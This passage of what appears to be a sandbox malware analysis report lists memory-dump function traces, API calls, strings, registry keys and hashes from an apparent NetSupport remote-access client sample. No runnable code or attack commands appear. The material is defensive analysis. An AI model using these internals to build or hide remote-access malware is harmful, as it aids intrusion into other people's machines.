                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 2427920155-3145022300
                                                                                        • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                        • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                        • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                        • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                        APIs
                                                                                        • _calloc.LIBCMT ref: 6D1D2FBB
                                                                                        • GetTickCount.KERNEL32 ref: 6D1D300D
                                                                                        • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6D1D301B
                                                                                        • _calloc.LIBCMT ref: 6D1D303B
                                                                                        • _memmove.LIBCMT ref: 6D1D3049
                                                                                        • InterlockedDecrement.KERNEL32(-000397B9), ref: 6D1D307F
                                                                                        • SetEvent.KERNEL32(0000031C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,92DF34B3), ref: 6D1D308C
                                                                                          • Part of subcall function 6D1D28D0: wsprintfA.USER32 ref: 6D1D2965
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3178096747-0
                                                                                        • Opcode ID: fc0f1a9b91511f52eec3b8ec6e9eefc82a38413eaeeca4bfa385fabcfc8938e2
                                                                                        • Instruction ID: dff48f52fe1e3450a47f7e494c9e2b74ae75926067da91b5c7a53c071049e8e1
                                                                                        • Opcode Fuzzy Hash: fc0f1a9b91511f52eec3b8ec6e9eefc82a38413eaeeca4bfa385fabcfc8938e2
                                                                                        • Instruction Fuzzy Hash: 0D4186B6C04209AFDB40CFE9C844AEFB7F8EF48304F01851AE519E7244E7B59605CBA1
                                                                                        APIs
                                                                                          • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                        • std::exception::exception.LIBCMT ref: 11107414
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                        • API String ID: 2851125068-2390547818
                                                                                        • Opcode ID: df44ccd14827e7239b96b436232c94f88ea3ff84a8a331e5a92631cd758ff476
                                                                                        • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                        • Opcode Fuzzy Hash: df44ccd14827e7239b96b436232c94f88ea3ff84a8a331e5a92631cd758ff476
                                                                                        • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(00000328,000000FF), ref: 1101733C
                                                                                        • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                        • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                        • CoUninitialize.COMBASE ref: 110173D0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                        • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                        • API String ID: 2407233060-578995875
                                                                                        • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                        • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                        • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                        • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(00000328,000000FF), ref: 11017252
                                                                                        • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                        • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                        • CoUninitialize.COMBASE ref: 110172E0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                        • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                        • API String ID: 2407233060-2037925671
                                                                                        • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                        • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                        • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                        • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                        APIs
                                                                                        • send.WSOCK32(?,?,?,00000000), ref: 6D1C9C93
                                                                                        • timeGetTime.WINMM(?,?,?,00000000), ref: 6D1C9CD0
                                                                                        • Sleep.KERNEL32(00000000), ref: 6D1C9CDE
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6D1C9D4F
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 6D1C9D72
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                        • String ID: 3'
                                                                                        • API String ID: 77915721-280543908
                                                                                        • Opcode ID: 8622c27eb31cd7b1fb7b71e543663e3d6d70be982e70730291036e454262f58c
                                                                                        • Instruction ID: f52b164e3a103b44cb0cd9a8a1f91a895835127e74a2fb357f83f4cbb1891f9b
                                                                                        • Opcode Fuzzy Hash: 8622c27eb31cd7b1fb7b71e543663e3d6d70be982e70730291036e454262f58c
                                                                                        • Instruction Fuzzy Hash: 17219371A041198FDB20CF64DC98BAAB3B4EF15329F0182D5E90DA7249DB78DD84CF92
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                        • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                        • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                        • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                        • API String ID: 4186647306-532032230
                                                                                        • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                        • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                        • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                        • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7736C3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                        • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                        • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                        • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                        • API String ID: 3360349984-1136101629
                                                                                        • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                        • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                        • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                        • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID: %s%s%s.bin$301389$_HF$_HW$_SW
                                                                                        • API String ID: 2111968516-3199141679
                                                                                        • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                        • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                        • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                        • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 6D1D6950
                                                                                          • Part of subcall function 6D1D7BE0: _memset.LIBCMT ref: 6D1D7BFF
                                                                                          • Part of subcall function 6D1D7BE0: _strncpy.LIBCMT ref: 6D1D7C0B
                                                                                          • Part of subcall function 6D1CA4E0: EnterCriticalSection.KERNEL32(6D20B898,00000000,?,?,?,6D1CDA7F,?,00000000), ref: 6D1CA503
                                                                                          • Part of subcall function 6D1CA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6D1CA568
                                                                                          • Part of subcall function 6D1CA4E0: Sleep.KERNEL32(00000000,?,6D1CDA7F,?,00000000), ref: 6D1CA581
                                                                                          • Part of subcall function 6D1CA4E0: LeaveCriticalSection.KERNEL32(6D20B898,00000000), ref: 6D1CA5B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                        • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                        • API String ID: 1112461860-1140593649
                                                                                        • Opcode ID: cc15f54f6cd04cfc717ad1222bb57eac17940993620a074c6ecac94511d593fd
                                                                                        • Instruction ID: b984e2f640caad37b0c177e483fa89b13f92875f0651760eeace9f902c23a4c5
                                                                                        • Opcode Fuzzy Hash: cc15f54f6cd04cfc717ad1222bb57eac17940993620a074c6ecac94511d593fd
                                                                                        • Instruction Fuzzy Hash: E651C5B1A0820E8FDB50DF78D898B7B77B4AB6670CF10012DD99183289DBB59445DBF2
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                        • API String ID: 47109696-3245241687
                                                                                        • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                        • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                        • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                        • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                        APIs
                                                                                          • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                          • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                          • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
